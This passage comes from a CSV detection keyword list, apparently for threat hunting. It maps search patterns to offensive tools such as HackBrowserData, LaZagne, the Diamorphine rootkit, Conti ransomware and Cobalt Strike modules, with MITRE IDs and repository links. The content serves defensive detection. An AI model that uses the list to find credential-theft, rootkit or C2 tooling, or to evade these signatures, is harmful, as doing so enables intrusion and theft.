PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc*",".{0,1000}H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm*",".{0,1000}H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*h8mail -*",".{0,1000}h8mail\s\-.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*h8mail -t *@*.*",".{0,1000}h8mail\s\-t\s.{0,1000}\@.{0,1000}\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*h8mail*",".{0,1000}h8mail.{0,1000}","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3925","497","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" "*Ha3MrX/Gemail-Hack*",".{0,1000}Ha3MrX\/Gemail\-Hack.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","10","929","368","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z" "*haad/proxychains*",".{0,1000}haad\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*haad/proxychains*",".{0,1000}haad\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*hackbrowersdata.cna*",".{0,1000}hackbrowersdata\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*hack-browser-data.exe*",".{0,1000}hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*hack-browser-data/*",".{0,1000}hack\-browser\-data\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*Hackcraft-Labs/SharpShares*",".{0,1000}Hackcraft\-Labs\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*Hacked by Skenda Unikkatil*",".{0,1000}Hacked\sby\sSkenda\sUnikkatil.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*hacked_getdents64(*",".{0,1000}hacked_getdents64\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*hacked_kill(*",".{0,1000}hacked_kill\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*HACKER*FUCKER*Xeroxxx*",".{0,1000}HACKER.{0,1000}FUCKER.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hackerhouse-opensource/OffensiveLua*",".{0,1000}hackerhouse\-opensource\/OffensiveLua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*hackerhouse-opensource/SignToolEx*",".{0,1000}hackerhouse\-opensource\/SignToolEx.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*hackerschoice/gsocket*",".{0,1000}hackerschoice\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*hackerschoice/gsocket-relay*",".{0,1000}hackerschoice\/gsocket\-relay.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*hackertarget-get-rootdomains *",".{0,1000}hackertarget\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*hackingtool.py*",".{0,1000}hackingtool\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*hackndo@gmail.com*",".{0,1000}hackndo\@gmail\.com.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*Hackplayers/evil-winrm*",".{0,1000}Hackplayers\/evil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hackrf_sweep -f *",".{0,1000}hackrf_sweep\s\-f\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hacksysteam/CVE-2023-*",".{0,1000}hacksysteam\/CVE\-2023\-.{0,1000}","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","263","59","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z" "*HackTheWorld*",".{0,1000}HackTheWorld.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","10","913","174","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z" "*Hacktool.Lazagne*",".{0,1000}Hacktool\.Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*hacktools-*.xpi*",".{0,1000}hacktools\-.{0,1000}\.xpi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*",".{0,1000}hack\-tools\/cmbndhnoonmghfofefkcccljbkdpamhi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*Hack-Tools-master*",".{0,1000}Hack\-Tools\-master.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*Hack-with-Github*",".{0,1000}Hack\-with\-Github.{0,1000}","offensive_tool_keyword","Github Username","An Open Source Hacking Tools database","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hades_directsys.exe*",".{0,1000}hades_directsys\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*HadesLdr-main*",".{0,1000}HadesLdr\-main.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*Hagrid29/DumpAADSyncCreds*",".{0,1000}Hagrid29\/DumpAADSyncCreds.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*Hak5 Cloud C?*",".{0,1000}Hak5\sCloud\sC\?.{0,1000}","offensive_tool_keyword","Hak5 Cloud C2","Hak5 Cloud C2 web title","T1071.001","TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*hak5/omg-payloads*",".{0,1000}hak5\/omg\-payloads.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*hakaioffsec/CVE-2024-21338*",".{0,1000}hakaioffsec\/CVE\-2024\-21338.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*haKCers.txt*",".{0,1000}haKCers\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hakluke/hakrawler*",".{0,1000}hakluke\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler -*",".{0,1000}hakrawler\s\-.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler.go*",".{0,1000}hakrawler\.go.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler@latest*",".{0,1000}hakrawler\@latest.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler-ip-range*",".{0,1000}hakrawler\-ip\-range.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*hakrawler-master*",".{0,1000}hakrawler\-master.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*haktrails subdomains*",".{0,1000}haktrails\ssubdomains.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*Hakumarachi/Bropper*",".{0,1000}Hakumarachi\/Bropper.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*handelsregister-get-company-names *",".{0,1000}handelsregister\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*handle_nessus_file*",".{0,1000}handle_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*handlekatz.py*",".{0,1000}handlekatz\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*handlekatz.x64.*",".{0,1000}handlekatz\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*handlekatz_bof.*",".{0,1000}handlekatz_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*handlekatz_dump*",".{0,1000}handlekatz_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*HANDLEKATZ_EXE_NAME=*",".{0,1000}HANDLEKATZ_EXE_NAME\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*handshake*jasmin@123*",".{0,1000}\""handshake\"",\s\""jasmin\@123\"".{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real 